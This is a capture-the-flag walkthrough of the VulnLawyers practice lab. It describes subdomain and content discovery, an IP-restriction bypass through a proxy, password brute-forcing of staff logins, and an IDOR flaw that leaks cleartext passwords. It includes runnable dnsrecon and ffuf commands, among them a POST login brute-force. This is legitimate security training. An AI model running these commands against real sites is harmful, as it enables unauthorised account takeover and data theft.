- Sudomain Discovery
-
dnsrecon -d vulnlawyers.co.uk -D ~/wordlists/subdomains.txt -t brt
!- Found
data.vulnlawyers.co.uk
andwww.vulnlaywers.co.uk
- Found
- Searching on crt.sh
- Nothing found.
- Accessing
data.vulnlawyers.co.uk
shows this Found Flag 1
-
- Content discovery on data.vulnlaywers.co.uk
ffuf -w ~/wordlists/content.txt -t 1 -p 0.1 -H "Cookie: ctfchallenge=eyJkYXRhIjoiZXlKMWMyVnlYMmhoYzJnaU9pSjRZM3A2TTNKMmR5SXNJbkJ5WlcxcGRXMGlPbVpoYkhObGZRPT0iLCJ2ZXJpZnkiOiJhYmYwNzRmYWI0Yzk2YjA3OTM4ZDcxNGQ0N2VhZWIzNSJ9" -u http://data.vulnlawyers.co.uk/FUZZ -mc all -fc 404
- Visited /users/and found some users' data Found Flag 3. This means that maybe there is a mail server running? No
- Content discovery on www.vulnlawyers.co.uk
ffuf -w ~/wordlists/content.txt -t 1 -p 0.1 -H "Cookie: ctfchallenge=eyJkYXRhIjoiZXlKMWMyVnlYMmhoYzJnaU9pSjRZM3A2TTNKMmR5SXNJbkJ5WlcxcGRXMGlPbVpoYkhObGZRPT0iLCJ2ZXJpZnkiOiJhYmYwNzRmYWI0Yzk2YjA3OTM4ZDcxNGQ0N2VhZWIzNSJ9" -u http://www.vulnlawyers.co.uk/FUZZ -mc all -fc 404
- Visited
/login
in the browser but it redirected me to/denied
page that showedAcess is denied from your IP address
error. - Visited
/login
but through Burp proxy, and this showed. Found Flag 2 - Visited
/laywers-only
through Burp that directed me to/laywers-only-login
then BOOM! A login protal.
- But from the
data.vulnlawyers.co.uk/users
api we found, we have a list of emails that we can now bruteforce their passwords. Trying with the first userffuf -w ~/wordlists/passwords.txt -t 1 -p 0.1 -X POST -d "email=marsha.blankenship%40vulnlawyers.co.uk&password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -H "Cookie: ctfchallenge=eyJkYXRhIjoiZXlKMWMyVnlYMmhoYzJnaU9pSjRZM3A2TTNKMmR5SXNJbkJ5WlcxcGRXMGlPbVpoYkhObGZRPT0iLCJ2ZXJpZnkiOiJhYmYwNzRmYWI0Yzk2YjA3OTM4ZDcxNGQ0N2VhZWIzNSJ9" -u http://www.vulnlawyers.co.uk/lawyers-only-login -mc all -fc 401
. Tried all users until I found - Logged in with
[email protected]
andsummer
as a username and a password respectively. Found this.Found Flag 4. - Surfed the website to see what it does. Found a
/lawyers-only-profile/
page that when seeing its page source, found this URL. - Visited
/laywers-only-profile-details/4
and found that it reveals the password of every user in cleartext and it is also an IDOR vuln. - Tried some ids and found another flag on
/laywers-only-profile-details/2
Found Flag 5 - It seems that user
shayne.cairns
is an admin because he can delete a case. - Last flag showed after deleting the case with this admin account.Found Flag 6